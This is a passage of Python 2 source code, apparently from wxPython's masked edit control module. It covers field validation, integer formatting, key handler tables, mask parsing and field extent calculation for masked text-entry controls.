if type(self._validRange) != types.TupleType or len( self._validRange )!= 2 or self._validRange[0] > self._validRange[1]:
## dbg(indent=0, suspend=0)
raise TypeError('%s: validRange %s parameter must be tuple of form (a,b) where a <= b'
% (str(self._index), repr(self._validRange)) )
self._hasRange = True
self._rangeLow = self._validRange[0]
self._rangeHigh = self._validRange[1]
if kwargs.has_key('choices') or (len(self._choices) and len(self._choices[0]) != len(self._mask)): # (set/changed)
self._hasList = False
if self._choices and type(self._choices) not in (types.TupleType, types.ListType):
## dbg(indent=0, suspend=0)
raise TypeError('%s: choices must be a sequence of strings' % str(self._index))
elif len( self._choices) > 0:
for choice in self._choices:
if type(choice) not in (types.StringType, types.UnicodeType):
## dbg(indent=0, suspend=0)
raise TypeError('%s: choices must be a sequence of strings' % str(self._index))
length = len(self._mask)
## dbg('len(%s)' % self._mask, length, 'len(self._choices):', len(self._choices), 'length:', length, 'self._alignRight?', self._alignRight)
if len(self._choices) and length:
if len(self._choices[0]) > length:
# changed mask without respecifying choices; readjust the width as appropriate:
self._choices = [choice.strip() for choice in self._choices]
if self._alignRight:
self._choices = [choice.rjust( length ) for choice in self._choices]
else:
self._choices = [choice.ljust( length ) for choice in self._choices]
## dbg('aligned choices:', self._choices)
if hasattr(self, '_template'):
# Verify each choice specified is valid:
for choice in self._choices:
if self.IsEmpty(choice) and not self._validRequired:
# allow empty values even if invalid, (just colored differently)
continue
if not self.IsValid(choice):
## dbg(indent=0, suspend=0)
ve = ValueError('%s: "%s" is not a valid value for the control as specified.' % (str(self._index), choice))
ve.value = choice
raise ve
self._hasList = True
#### dbg("kwargs.has_key('fillChar')?", kwargs.has_key('fillChar'), "len(self._choices) > 0?", len(self._choices) > 0)
#### dbg("self._old_fillChar:'%s'" % self._old_fillChar, "self._fillChar: '%s'" % self._fillChar)
if kwargs.has_key('fillChar') and len(self._choices) > 0:
if kwargs['fillChar'] != ' ':
self._choices = [choice.replace(' ', self._fillChar) for choice in self._choices]
else:
self._choices = [choice.replace(self._old_fillChar, self._fillChar) for choice in self._choices]
## dbg('updated choices:', self._choices)
if kwargs.has_key('autoSelect') and kwargs['autoSelect']:
if not self._hasList:
## dbg('no list to auto complete; ignoring "autoSelect=True"')
self._autoSelect = False
# reset field validity assumption:
self._valid = True
## dbg(indent=0, suspend=0)
def _GetParameter(self, paramname):
"""
Routine for retrieving the value of any given parameter
"""
if Field.valid_params.has_key(paramname):
return getattr(self, '_' + paramname)
else:
TypeError('Field._GetParameter: invalid parameter "%s"' % key)
def IsEmpty(self, slice):
"""
Indicates whether the specified slice is considered empty for the
field.
"""
## dbg('Field::IsEmpty("%s")' % slice, indent=1)
if not hasattr(self, '_template'):
## dbg(indent=0)
raise AttributeError('_template')
## dbg('self._template: "%s"' % self._template)
## dbg('self._defaultValue: "%s"' % str(self._defaultValue))
if slice == self._template and not self._defaultValue:
## dbg(indent=0)
return True
elif slice == self._template:
empty = True
for pos in range(len(self._template)):
#### dbg('slice[%(pos)d] != self._fillChar?' %locals(), slice[pos] != self._fillChar[pos])
if slice[pos] not in (' ', self._fillChar):
empty = False
break
## dbg("IsEmpty? %(empty)d (do all mask chars == fillChar?)" % locals(), indent=0)
return empty
else:
## dbg("IsEmpty? 0 (slice doesn't match template)", indent=0)
return False
def IsValid(self, slice):
"""
Indicates whether the specified slice is considered a valid value for the
field.
"""
## dbg(suspend=1)
## dbg('Field[%s]::IsValid("%s")' % (str(self._index), slice), indent=1)
valid = True # assume true to start
if self.IsEmpty(slice):
## dbg(indent=0, suspend=0)
if self._emptyInvalid:
return False
else:
return True
elif self._hasList and self._choiceRequired:
## dbg("(member of list required)")
# do case-insensitive match on list; strip surrounding whitespace from slice (already done for choices):
if self._fillChar != ' ':
slice = slice.replace(self._fillChar, ' ')
## dbg('updated slice:"%s"' % slice)
compareStr = slice.strip()
if self._compareNoCase:
compareStr = compareStr.lower()
valid = compareStr in self._compareChoices
elif self._hasRange and not self.IsEmpty(slice):
## dbg('validating against range')
try:
# allow float as well as int ranges (int comparisons for free.)
valid = self._rangeLow <= float(slice) <= self._rangeHigh
except:
valid = False
elif self._validRegex and self._filter:
## dbg('validating against regex')
valid = (re.match( self._filter, slice) is not None)
if valid and self._validFunc:
## dbg('validating against supplied function')
valid = self._validFunc(slice)
## dbg('valid?', valid, indent=0, suspend=0)
return valid
def _AdjustField(self, slice):
""" 'Fixes' an integer field. Right or left-justifies, as required."""
## dbg('Field::_AdjustField("%s")' % slice, indent=1)
length = len(self._mask)
#### dbg('length(self._mask):', length)
#### dbg('self._useParensForNegatives?', self._useParensForNegatives)
if self._isInt:
if self._useParensForNegatives:
signpos = slice.find('(')
right_signpos = slice.find(')')
intStr = slice.replace('(', '').replace(')', '') # drop sign, if any
else:
signpos = slice.find('-')
intStr = slice.replace( '-', '' ) # drop sign, if any
right_signpos = -1
intStr = intStr.replace(' ', '') # drop extra spaces
intStr = string.replace(intStr,self._fillChar,"") # drop extra fillchars
intStr = string.replace(intStr,"-","") # drop sign, if any
intStr = string.replace(intStr, self._groupChar, "") # lose commas/dots
#### dbg('intStr:"%s"' % intStr)
start, end = self._extent
field_len = end - start
if not self._padZero and len(intStr) != field_len and intStr.strip():
intStr = str(long(intStr))
#### dbg('raw int str: "%s"' % intStr)
#### dbg('self._groupdigits:', self._groupdigits, 'self._formatcodes:', self._formatcodes)
if self._groupdigits:
new = ''
cnt = 1
for i in range(len(intStr)-1, -1, -1):
new = intStr[i] + new
if (cnt) % 3 == 0:
new = self._groupChar + new
cnt += 1
if new and new[0] == self._groupChar:
new = new[1:]
if len(new) <= length:
# expanded string will still fit and leave room for sign:
intStr = new
# else... leave it without the commas...
## dbg('padzero?', self._padZero)
## dbg('len(intStr):', len(intStr), 'field length:', length)
if self._padZero and len(intStr) < length:
intStr = '0' * (length - len(intStr)) + intStr
if signpos != -1: # we had a sign before; restore it
if self._useParensForNegatives:
intStr = '(' + intStr[1:]
if right_signpos != -1:
intStr += ')'
else:
intStr = '-' + intStr[1:]
elif signpos != -1 and slice[0:signpos].strip() == '': # - was before digits
if self._useParensForNegatives:
intStr = '(' + intStr
if right_signpos != -1:
intStr += ')'
else:
intStr = '-' + intStr
elif right_signpos != -1:
# must have had ')' but '(' was before field; re-add ')'
intStr += ')'
slice = intStr
slice = slice.strip() # drop extra spaces
if self._alignRight: ## Only if right-alignment is enabled
slice = slice.rjust( length )
else:
slice = slice.ljust( length )
if self._fillChar != ' ':
slice = slice.replace(' ', self._fillChar)
## dbg('adjusted slice: "%s"' % slice, indent=0)
return slice
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
class MaskedEditMixin:
"""
This class allows us to abstract the masked edit functionality that could
be associated with any text entry control. (eg. wx.TextCtrl, wx.ComboBox, etc.)
It forms the basis for all of the lib.masked controls.
"""
valid_ctrl_params = {
'mask': 'XXXXXXXXXXXXX', ## mask string for formatting this control
'autoformat': "", ## optional auto-format code to set format from masktags dictionary
'fields': {}, ## optional list/dictionary of maskededit.Field class instances, indexed by position in mask
'datestyle': 'MDY', ## optional date style for date-type values. Can trigger autocomplete year
'autoCompleteKeycodes': [], ## Optional list of additional keycodes which will invoke field-auto-complete
'useFixedWidthFont': True, ## Use fixed-width font instead of default for base control
'defaultEncoding': 'latin1', ## optional argument to indicate unicode codec to use (unicode ctrls only)
'retainFieldValidation': False, ## Set this to true if setting control-level parameters independently,
## from field validation constraints
'emptyBackgroundColour': "White",
'validBackgroundColour': "White",
'invalidBackgroundColour': "Yellow",
'foregroundColour': "Black",
'signedForegroundColour': "Red",
'demo': False}
def __init__(self, name = 'MaskedEdit', **kwargs):
"""
This is the "constructor" for setting up the mixin variable parameters for the composite class.
"""
self.name = name
# set up flag for doing optional things to base control if possible
if not hasattr(self, 'controlInitialized'):
self.controlInitialized = False
# Set internal state var for keeping track of whether or not a character
# action results in a modification of the control, since .SetValue()
# doesn't modify the base control's internal state:
self.modified = False
self._previous_mask = None
# Validate legitimate set of parameters:
for key in kwargs.keys():
if key.replace('Color', 'Colour') not in MaskedEditMixin.valid_ctrl_params.keys() + Field.valid_params.keys():
raise TypeError('%s: invalid parameter "%s"' % (name, key))
## Set up dictionary that can be used by subclasses to override or add to default
## behavior for individual characters. Derived subclasses needing to change
## default behavior for keys can either redefine the default functions for the
## common keys or add functions for specific keys to this list. Each function
## added should take the key event as argument, and return False if the key
## requires no further processing.
##
## Initially populated with navigation and function control keys:
self._keyhandlers = {
# default navigation keys and handlers:
wx.WXK_BACK: self._OnErase,
wx.WXK_LEFT: self._OnArrow,
wx.WXK_NUMPAD_LEFT: self._OnArrow,
wx.WXK_RIGHT: self._OnArrow,
wx.WXK_NUMPAD_RIGHT: self._OnArrow,
wx.WXK_UP: self._OnAutoCompleteField,
wx.WXK_NUMPAD_UP: self._OnAutoCompleteField,
wx.WXK_DOWN: self._OnAutoCompleteField,
wx.WXK_NUMPAD_DOWN: self._OnAutoCompleteField,
wx.WXK_TAB: self._OnChangeField,
wx.WXK_HOME: self._OnHome,
wx.WXK_NUMPAD_HOME: self._OnHome,
wx.WXK_END: self._OnEnd,
wx.WXK_NUMPAD_END: self._OnEnd,
wx.WXK_RETURN: self._OnReturn,
wx.WXK_NUMPAD_ENTER: self._OnReturn,
wx.WXK_PRIOR: self._OnAutoCompleteField,
wx.WXK_NUMPAD_PRIOR: self._OnAutoCompleteField,
wx.WXK_NEXT: self._OnAutoCompleteField,
wx.WXK_NUMPAD_NEXT: self._OnAutoCompleteField,
# default function control keys and handlers:
wx.WXK_DELETE: self._OnDelete,
wx.WXK_NUMPAD_DELETE: self._OnDelete,
wx.WXK_INSERT: self._OnInsert,
wx.WXK_NUMPAD_INSERT: self._OnInsert,
WXK_CTRL_A: self._OnCtrl_A,
WXK_CTRL_C: self._OnCtrl_C,
WXK_CTRL_S: self._OnCtrl_S,
WXK_CTRL_V: self._OnCtrl_V,
WXK_CTRL_X: self._OnCtrl_X,
WXK_CTRL_Z: self._OnCtrl_Z,
}
## bind standard navigational and control keycodes to this instance,
## so that they can be augmented and/or changed in derived classes:
self._nav = list(nav)
self._control = list(control)
## Dynamically evaluate and store string constants for mask chars
## so that locale settings can be made after this module is imported
## and the controls created after that is done can allow the
## appropriate characters:
self.maskchardict = {
'#': string.digits,
'A': string.uppercase,
'a': string.lowercase,
'X': string.letters + string.punctuation + string.digits,
'C': string.letters,
'N': string.letters + string.digits,
'&': string.punctuation,
'*': ansichars # to give it a value, but now allows any non-wxcontrol character
}
## self._ignoreChange is used by MaskedComboBox, because
## of the hack necessary to determine the selection; it causes
## EVT_TEXT messages from the combobox to be ignored if set.
self._ignoreChange = False
# These are used to keep track of previous value, for undo functionality:
self._curValue = None
self._prevValue = None
self._valid = True
# Set defaults for each parameter for this instance, and fully
# populate initial parameter list for configuration:
for key, value in MaskedEditMixin.valid_ctrl_params.items():
setattr(self, '_' + key, copy.copy(value))
if not kwargs.has_key(key):
#### dbg('%s: "%s"' % (key, repr(value)))
kwargs[key] = copy.copy(value)
# Create a "field" that holds global parameters for control constraints
self._ctrl_constraints = self._fields[-1] = Field(index=-1)
self.SetCtrlParameters(**kwargs)
def SetCtrlParameters(self, **kwargs):
"""
This public function can be used to set individual or multiple masked edit
parameters after construction. (See maskededit module overview for the list
of valid parameters.)
"""
## dbg(suspend=1)
## dbg('MaskedEditMixin::SetCtrlParameters', indent=1)
#### dbg('kwargs:', indent=1)
## for key, value in kwargs.items():
#### dbg(key, '=', value)
#### dbg(indent=0)
# Validate keyword arguments:
constraint_kwargs = {}
ctrl_kwargs = {}
for key, value in kwargs.items():
key = key.replace('Color', 'Colour') # for b-c, and standard wxPython spelling
if key not in MaskedEditMixin.valid_ctrl_params.keys() + Field.valid_params.keys():
## dbg(indent=0, suspend=0)
ae = AttributeError('Invalid keyword argument "%s" for control "%s"' % (key, self.name))
ae.attribute = key
raise ae
elif key in Field.valid_params.keys():
constraint_kwargs[key] = value
else:
ctrl_kwargs[key] = value
mask = None
reset_args = {}
if ctrl_kwargs.has_key('autoformat'):
autoformat = ctrl_kwargs['autoformat']
else:
autoformat = None
# handle "parochial name" backward compatibility:
if autoformat and autoformat.find('MILTIME') != -1 and autoformat not in masktags.keys():
autoformat = autoformat.replace('MILTIME', '24HRTIME')
if autoformat != self._autoformat and autoformat in masktags.keys():
## dbg('autoformat:', autoformat)
self._autoformat = autoformat
mask = masktags[self._autoformat]['mask']
# gather rest of any autoformat parameters:
for param, value in masktags[self._autoformat].items():
if param == 'mask': continue # (must be present; already accounted for)
constraint_kwargs[param] = value
elif autoformat and not autoformat in masktags.keys():
ae = AttributeError('invalid value for autoformat parameter: %s' % repr(autoformat))
ae.attribute = autoformat
raise ae
else:
## dbg('autoformat not selected')
if kwargs.has_key('mask'):
mask = kwargs['mask']
## dbg('mask:', mask)
## Assign style flags
if mask is None:
## dbg('preserving previous mask')
mask = self._previous_mask # preserve previous mask
else:
## dbg('mask (re)set')
reset_args['reset_mask'] = mask
constraint_kwargs['mask'] = mask
# wipe out previous fields; preserve new control-level constraints
self._fields = {-1: self._ctrl_constraints}
if ctrl_kwargs.has_key('fields'):
# do field parameter type validation, and conversion to internal dictionary
# as appropriate:
fields = ctrl_kwargs['fields']
if type(fields) in (types.ListType, types.TupleType):
for i in range(len(fields)):
field = fields[i]
if not isinstance(field, Field):
## dbg(indent=0, suspend=0)
raise TypeError('invalid type for field parameter: %s' % repr(field))
self._fields[i] = field
elif type(fields) == types.DictionaryType:
for index, field in fields.items():
if not isinstance(field, Field):
## dbg(indent=0, suspend=0)
raise TypeError('invalid type for field parameter: %s' % repr(field))
self._fields[index] = field
else:
## dbg(indent=0, suspend=0)
raise TypeError('fields parameter must be a list or dictionary; not %s' % repr(fields))
# Assign constraint parameters for entire control:
#### dbg('control constraints:', indent=1)
## for key, value in constraint_kwargs.items():
#### dbg('%s:' % key, value)
#### dbg(indent=0)
# determine if changing parameters that should affect the entire control:
for key in MaskedEditMixin.valid_ctrl_params.keys():
if key in ( 'mask', 'fields' ): continue # (processed separately)
if ctrl_kwargs.has_key(key):
setattr(self, '_' + key, ctrl_kwargs[key])
# Validate color parameters, converting strings to named colors and validating
# result if appropriate:
for key in ('emptyBackgroundColour', 'invalidBackgroundColour', 'validBackgroundColour',
'foregroundColour', 'signedForegroundColour'):
if ctrl_kwargs.has_key(key):
if type(ctrl_kwargs[key]) in (types.StringType, types.UnicodeType):
c = wx.NamedColour(ctrl_kwargs[key])
if c.Get() == (-1, -1, -1):
raise TypeError('%s not a legal color specification for %s' % (repr(ctrl_kwargs[key]), key))
else:
# replace attribute with wxColour object:
setattr(self, '_' + key, c)
# attach a python dynamic attribute to wxColour for debug printouts
c._name = ctrl_kwargs[key]
elif type(ctrl_kwargs[key]) != type(wx.BLACK):
raise TypeError('%s not a legal color specification for %s' % (repr(ctrl_kwargs[key]), key))
## dbg('self._retainFieldValidation:', self._retainFieldValidation)
if not self._retainFieldValidation:
# Build dictionary of any changing parameters which should be propagated to the
# component fields:
for arg in Field.propagating_params:
#### dbg('kwargs.has_key(%s)?' % arg, kwargs.has_key(arg))
#### dbg('getattr(self._ctrl_constraints, _%s)?' % arg, getattr(self._ctrl_constraints, '_'+arg))
reset_args[arg] = kwargs.has_key(arg) and kwargs[arg] != getattr(self._ctrl_constraints, '_'+arg)
#### dbg('reset_args[%s]?' % arg, reset_args[arg])
# Set the control-level constraints:
self._ctrl_constraints._SetParameters(**constraint_kwargs)
# This routine does the bulk of the interdependent parameter processing, determining
# the field extents of the mask if changed, resetting parameters as appropriate,
# determining the overall template value for the control, etc.
self._configure(mask, **reset_args)
# now that we've propagated the field constraints and mask portions to the
# various fields, validate the constraints
self._ctrl_constraints._ValidateParameters(**constraint_kwargs)
# Validate that all choices for given fields are at least of the
# necessary length, and that they all would be valid pastes if pasted
# into their respective fields:
#### dbg('validating choices')
self._validateChoices()
self._autofit = self._ctrl_constraints._autofit
self._isNeg = False
self._isDate = 'D' in self._ctrl_constraints._formatcodes and _isDateType(mask)
self._isTime = 'T' in self._ctrl_constraints._formatcodes and _isTimeType(mask)
if self._isDate:
# Set _dateExtent, used in date validation to locate date in string;
# always set as though year will be 4 digits, even if mask only has
# 2 digits, so we can always properly process the intended year for
# date validation (leap years, etc.)
if self._mask.find('CCC') != -1: self._dateExtent = 11
else: self._dateExtent = 10
self._4digityear = len(self._mask) > 8 and self._mask[9] == '#'
if self._isDate and self._autoformat:
# Auto-decide datestyle:
if self._autoformat.find('MDDY') != -1: self._datestyle = 'MDY'
elif self._autoformat.find('YMMD') != -1: self._datestyle = 'YMD'
elif self._autoformat.find('YMMMD') != -1: self._datestyle = 'YMD'
elif self._autoformat.find('DMMY') != -1: self._datestyle = 'DMY'
elif self._autoformat.find('DMMMY') != -1: self._datestyle = 'DMY'
# Give derived controls a chance to react to parameter changes before
# potentially changing current value of the control.
self._OnCtrlParametersChanged()
if self.controlInitialized:
# Then the base control is available for configuration;
# take action on base control based on new settings, as appropriate.
if kwargs.has_key('useFixedWidthFont'):
# Set control font - fixed width by default
self._setFont()
if reset_args.has_key('reset_mask'):
## dbg('reset mask')
curvalue = self._GetValue()
if curvalue.strip():
try:
## dbg('attempting to _SetInitialValue(%s)' % self._GetValue())
self._SetInitialValue(self._GetValue())
except Exception, e:
## dbg('exception caught:', e)
## dbg("current value doesn't work; attempting to reset to template")
self._SetInitialValue()
else:
## dbg('attempting to _SetInitialValue() with template')
self._SetInitialValue()
elif kwargs.has_key('useParensForNegatives'):
newvalue = self._getSignedValue()[0]
if newvalue is not None:
# Adjust for new mask:
if len(newvalue) < len(self._mask):
newvalue += ' '
elif len(newvalue) > len(self._mask):
if newvalue[-1] in (' ', ')'):
newvalue = newvalue[:-1]
## dbg('reconfiguring value for parens:"%s"' % newvalue)
self._SetValue(newvalue)
if self._prevValue != newvalue:
self._prevValue = newvalue # disallow undo of sign type
if self._autofit:
## dbg('calculated size:', self._CalcSize())
self.SetClientSize(self._CalcSize())
width = self.GetSize().width
height = self.GetBestSize().height
## dbg('setting client size to:', (width, height))
self.SetInitialSize((width, height))
# Set value/type-specific formatting
self._applyFormatting()
## dbg(indent=0, suspend=0)
def SetMaskParameters(self, **kwargs):
""" old name for the SetCtrlParameters function (DEPRECATED)"""
return self.SetCtrlParameters(**kwargs)
def GetCtrlParameter(self, paramname):
"""
Routine for retrieving the value of any given parameter
"""
if MaskedEditMixin.valid_ctrl_params.has_key(paramname.replace('Color','Colour')):
return getattr(self, '_' + paramname.replace('Color', 'Colour'))
elif Field.valid_params.has_key(paramname):
return self._ctrl_constraints._GetParameter(paramname)
else:
TypeError('"%s".GetCtrlParameter: invalid parameter "%s"' % (self.name, paramname))
def GetMaskParameter(self, paramname):
""" old name for the GetCtrlParameters function (DEPRECATED)"""
return self.GetCtrlParameter(paramname)
## This idea worked, but Boa was unable to use this solution...
## def _attachMethod(self, func):
## import new
## setattr(self, func.__name__, new.instancemethod(func, self, self.__class__))
##
##
## def _DefinePropertyFunctions(exposed_params):
## for param in exposed_params:
## propname = param[0].upper() + param[1:]
##
## exec('def Set%s(self, value): self.SetCtrlParameters(%s=value)' % (propname, param))
## exec('def Get%s(self): return self.GetCtrlParameter("%s")''' % (propname, param))
## self._attachMethod(locals()['Set%s' % propname])
## self._attachMethod(locals()['Get%s' % propname])
##
## if param.find('Colour') != -1:
## # add non-british spellings, for backward-compatibility
## propname.replace('Colour', 'Color')
##
## exec('def Set%s(self, value): self.SetCtrlParameters(%s=value)' % (propname, param))
## exec('def Get%s(self): return self.GetCtrlParameter("%s")''' % (propname, param))
## self._attachMethod(locals()['Set%s' % propname])
## self._attachMethod(locals()['Get%s' % propname])
##
def SetFieldParameters(self, field_index, **kwargs):
"""
Routine provided to modify the parameters of a given field.
Because changes to fields can affect the overall control,
direct access to the fields is prevented, and the control
is always "reconfigured" after setting a field parameter.
(See maskededit module overview for the list of valid field-level
parameters.)
"""
if field_index not in self._field_indices:
ie = IndexError('%s is not a valid field for control "%s".' % (str(field_index), self.name))
ie.index = field_index
raise ie
# set parameters as requested:
self._fields[field_index]._SetParameters(**kwargs)
# Possibly reprogram control template due to resulting changes, and ensure
# control-level params are still propagated to fields:
self._configure(self._previous_mask)
self._fields[field_index]._ValidateParameters(**kwargs)
if self.controlInitialized:
if kwargs.has_key('fillChar') or kwargs.has_key('defaultValue'):
self._SetInitialValue()
if self._autofit:
# this is tricky, because, as Robin explains:
# "Basically there are two sizes to deal with, that are potentially
# different. The client size is the inside size and may, depending
# on platform, exclude the borders and such. The normal size is
# the outside size that does include the borders. What you are
# calculating (in _CalcSize) is the client size, but the sizers
# deal with the full size and so that is the minimum size that
# we need to set with SetInitialSize. The root of the problem is
# that in _calcSize the current client size height is returned,
# instead of a height based on the current font. So I suggest using
# _calcSize to just get the width, and then use GetBestSize to
# get the height."
self.SetClientSize(self._CalcSize())
width = self.GetSize().width
height = self.GetBestSize().height
self.SetInitialSize((width, height))
# Set value/type-specific formatting
self._applyFormatting()
def GetFieldParameter(self, field_index, paramname):
"""
Routine provided for getting a parameter of an individual field.
"""
if field_index not in self._field_indices:
ie = IndexError('%s is not a valid field for control "%s".' % (str(field_index), self.name))
ie.index = field_index
raise ie
elif Field.valid_params.has_key(paramname):
return self._fields[field_index]._GetParameter(paramname)
else:
ae = AttributeError('"%s".GetFieldParameter: invalid parameter "%s"' % (self.name, paramname))
ae.attribute = paramname
raise ae
def _SetKeycodeHandler(self, keycode, func):
"""
This function adds and/or replaces key event handling functions
used by the control. <func> should take the event as argument
and return False if no further action on the key is necessary.
"""
if func:
self._keyhandlers[keycode] = func
elif self._keyhandlers.has_key(keycode):
del self._keyhandlers[keycode]
def _SetKeyHandler(self, char, func):
"""
This function adds and/or replaces key event handling functions
for ascii characters. <func> should take the event as argument
and return False if no further action on the key is necessary.
"""
self._SetKeycodeHandler(ord(char), func)
def _AddNavKeycode(self, keycode, handler=None):
"""
This function allows a derived subclass to augment the list of
keycodes that are considered "navigational" keys.
"""
self._nav.append(keycode)
if handler:
self._keyhandlers[keycode] = handler
elif self.keyhandlers.has_key(keycode):
del self._keyhandlers[keycode]
def _AddNavKey(self, char, handler=None):
"""
This function is a convenience function so you don't have to
remember to call ord() for ascii chars to be used for navigation.
"""
self._AddNavKeycode(ord(char), handler)
def _GetNavKeycodes(self):
"""
This function retrieves the current list of navigational keycodes for
the control.
"""
return self._nav
def _SetNavKeycodes(self, keycode_func_tuples):
"""
This function allows you to replace the current list of keycode processed
as navigation keys, and bind associated optional keyhandlers.
"""
self._nav = []
for keycode, func in keycode_func_tuples:
self._nav.append(keycode)
if func:
self._keyhandlers[keycode] = func
elif self.keyhandlers.has_key(keycode):
del self._keyhandlers[keycode]
def _processMask(self, mask):
"""
This subroutine expands {n} syntax in mask strings, and looks for escaped
special characters and returns the expanded mask, and an dictionary
of booleans indicating whether or not a given position in the mask is
a mask character or not.
"""
## dbg('_processMask: mask', mask, indent=1)
# regular expression for parsing c{n} syntax:
rex = re.compile('([' +string.join(maskchars,"") + '])\{(\d+)\}')
s = mask
match = rex.search(s)
while match: # found an(other) occurrence
maskchr = s[match.start(1):match.end(1)] # char to be repeated
repcount = int(s[match.start(2):match.end(2)]) # the number of times
replacement = string.join( maskchr * repcount, "") # the resulting substr
s = s[:match.start(1)] + replacement + s[match.end(2)+1:] #account for trailing '}'
match = rex.search(s) # look for another such entry in mask
self._decimalChar = self._ctrl_constraints._decimalChar
self._shiftDecimalChar = self._ctrl_constraints._shiftDecimalChar
self._isFloat = _isFloatingPoint(s) and not self._ctrl_constraints._validRegex
self._isInt = _isInteger(s) and not self._ctrl_constraints._validRegex
self._signOk = '-' in self._ctrl_constraints._formatcodes and (self._isFloat or self._isInt)
self._useParens = self._ctrl_constraints._useParensForNegatives
self._isNeg = False
#### dbg('self._signOk?', self._signOk, 'self._useParens?', self._useParens)
#### dbg('isFloatingPoint(%s)?' % (s), _isFloatingPoint(s),
## 'ctrl regex:', self._ctrl_constraints._validRegex)
if self._signOk and s[0] != ' ':
s = ' ' + s
if self._ctrl_constraints._defaultValue and self._ctrl_constraints._defaultValue[0] != ' ':
self._ctrl_constraints._defaultValue = ' ' + self._ctrl_constraints._defaultValue
self._signpos = 0
if self._useParens:
s += ' '
self._ctrl_constraints._defaultValue += ' '
# Now, go build up a dictionary of booleans, indexed by position,
# indicating whether or not a given position is masked or not.
# Also, strip out any '|' chars, adjusting the mask as necessary,
# marking the appropriate positions for field boundaries:
ismasked = {}
explicit_field_boundaries = []
i = 0
while i < len(s):
if s[i] == '\\': # if escaped character:
ismasked[i] = False # mark position as not a mask char
if i+1 < len(s): # if another char follows...
s = s[:i] + s[i+1:] # elide the '\'
if i+2 < len(s) and s[i+1] == '\\':
# if next char also a '\', char is a literal '\'
s = s[:i] + s[i+1:] # elide the 2nd '\' as well
i += 1 # increment to next char
elif s[i] == '|':
s = s[:i] + s[i+1:] # elide the '|'
explicit_field_boundaries.append(i)
# keep index where it is:
else: # else if special char, mark position accordingly
ismasked[i] = s[i] in maskchars
#### dbg('ismasked[%d]:' % i, ismasked[i], s)
i += 1 # increment to next char
#### dbg('ismasked:', ismasked)
## dbg('new mask: "%s"' % s, indent=0)
return s, ismasked, explicit_field_boundaries
def _calcFieldExtents(self):
"""
Subroutine responsible for establishing/configuring field instances with
indices and editable extents appropriate to the specified mask, and building
the lookup table mapping each position to the corresponding field.
"""
self._lookupField = {}
if self._mask:
## Create dictionary of positions,characters in mask
self.maskdict = {}
for charnum in range( len( self._mask)):
self.maskdict[charnum] = self._mask[charnum:charnum+1]
# For the current mask, create an ordered list of field extents
# and a dictionary of positions that map to field indices:
if self._signOk: start = 1
else: start = 0
if self._isFloat:
# Skip field "discovery", and just construct a 2-field control with appropriate
# constraints for a floating-point entry.
# .setdefault always constructs 2nd argument even if not needed, so we do this
# the old-fashioned way...
if not self._fields.has_key(0):
self._fields[0] = Field()
if not self._fields.has_key(1):
self._fields[1] = Field()
self._decimalpos = string.find( self._mask, '.')
## dbg('decimal pos =', self._decimalpos)
formatcodes = self._fields[0]._GetParameter('formatcodes')
if 'R' not in formatcodes: formatcodes += 'R'
self._fields[0]._SetParameters(index=0, extent=(start, self._decimalpos),
mask=self._mask[start:self._decimalpos], formatcodes=formatcodes)
end = len(self._mask)
if self._signOk and self._useParens:
end -= 1
self._fields[1]._SetParameters(index=1, extent=(self._decimalpos+1, end),
mask=self._mask[self._decimalpos+1:end])
for i in range(self._decimalpos+1):
self._lookupField[i] = 0
for i in range(self._decimalpos+1, len(self._mask)+1):
self._lookupField[i] = 1
elif self._isInt:
# Skip field "discovery", and just construct a 1-field control with appropriate
# constraints for a integer entry.
if not self._fields.has_key(0):
self._fields[0] = Field(index=0)
end = len(self._mask)
if self._signOk and self._useParens:
end -= 1
self._fields[0]._SetParameters(index=0, extent=(start, end),
mask=self._mask[start:end])
for i in range(len(self._mask)+1):
self._lookupField[i] = 0
else:
# generic control; parse mask to figure out where the fields are:
field_index = 0
pos = 0
i = self._findNextEntry(pos,adjustInsert=False) # go to 1st entry point:
if i < len(self._mask): # no editable chars!
for j in range(pos, i+1):
self._lookupField[j] = field_index
pos = i # figure out field for 1st editable space:
while i <= len(self._mask):
#### dbg('searching: outer field loop: i = ', i)
if self._isMaskChar(i):
#### dbg('1st char is mask char; recording edit_start=', i)
edit_start = i
# Skip to end of editable part of current field:
while i < len(self._mask) and self._isMaskChar(i):
self._lookupField[i] = field_index
i += 1
if i in self._explicit_field_boundaries:
break
#### dbg('edit_end =', i)
edit_end = i
self._lookupField[i] = field_index
#### dbg('self._fields.has_key(%d)?' % field_index, self._fields.has_key(field_index))
if not self._fields.has_key(field_index):
kwargs = Field.valid_params.copy()
kwargs['index'] = field_index
kwargs['extent'] = (edit_start, edit_end)
kwargs['mask'] = self._mask[edit_start:edit_end]
self._fields[field_index] = Field(**kwargs)
else:
self._fields[field_index]._SetParameters(
index=field_index,
extent=(edit_start, edit_end),
mask=self._mask[edit_start:edit_end])
pos = i
i = self._findNextEntry(pos, adjustInsert=False) # go to next field:
#### dbg('next entry:', i)
if i > pos:
for j in range(pos, i+1):
self._lookupField[j] = field_index
if i >= len(self._mask):
break # if past end, we're done
else:
field_index += 1
#### dbg('next field:', field_index)
indices = self._fields.keys()
indices.sort()
self._field_indices = indices[1:]
#### dbg('lookupField map:', indent=1)
## for i in range(len(self._mask)):
#### dbg('pos %d:' % i, self._lookupField[i])
#### dbg(indent=0)
# Verify that all field indices specified are valid for mask:
for index in self._fields.keys():
if index not in [-1] + self._lookupField.values():
ie = IndexError('field %d is not a valid field for mask "%s"' % (index, self._mask))
ie.index = index
raise ie
def _calcTemplate(self, reset_fillchar, reset_default):
"""
Subroutine for processing current fillchars and default values for
whole control and individual fields, constructing the resulting
overall template, and adjusting the current value as necessary.
"""
default_set = False
if self._ctrl_constraints._defaultValue:
default_set = True
else:
for field in self._fields.values():
if field._defaultValue and not reset_default:
default_set = True
## dbg('default set?', default_set)
# Determine overall new template for control, and keep track of previous
# values, so that current control value can be modified as appropriate:
if self.controlInitialized: curvalue = list(self._GetValue())
else: curvalue = None
if hasattr(self, '_fillChar'): old_fillchars = self._fillChar
else: old_fillchars = None
if hasattr(self, '_template'): old_template = self._template
else: old_template = None
self._template = ""
self._fillChar = {}
reset_value = False
for field in self._fields.values():
field._template = ""
for pos in range(len(self._mask)):
#### dbg('pos:', pos)
field = self._FindField(pos)
#### dbg('field:', field._index)
start, end = field._extent
if pos == 0 and self._signOk:
self._template = ' ' # always make 1st 1st position blank, regardless of fillchar
elif self._isFloat and pos == self._decimalpos:
self._template += self._decimalChar
elif self._isMaskChar(pos):
if field._fillChar != self._ctrl_constraints._fillChar and not reset_fillchar:
fillChar = field._fillChar
else:
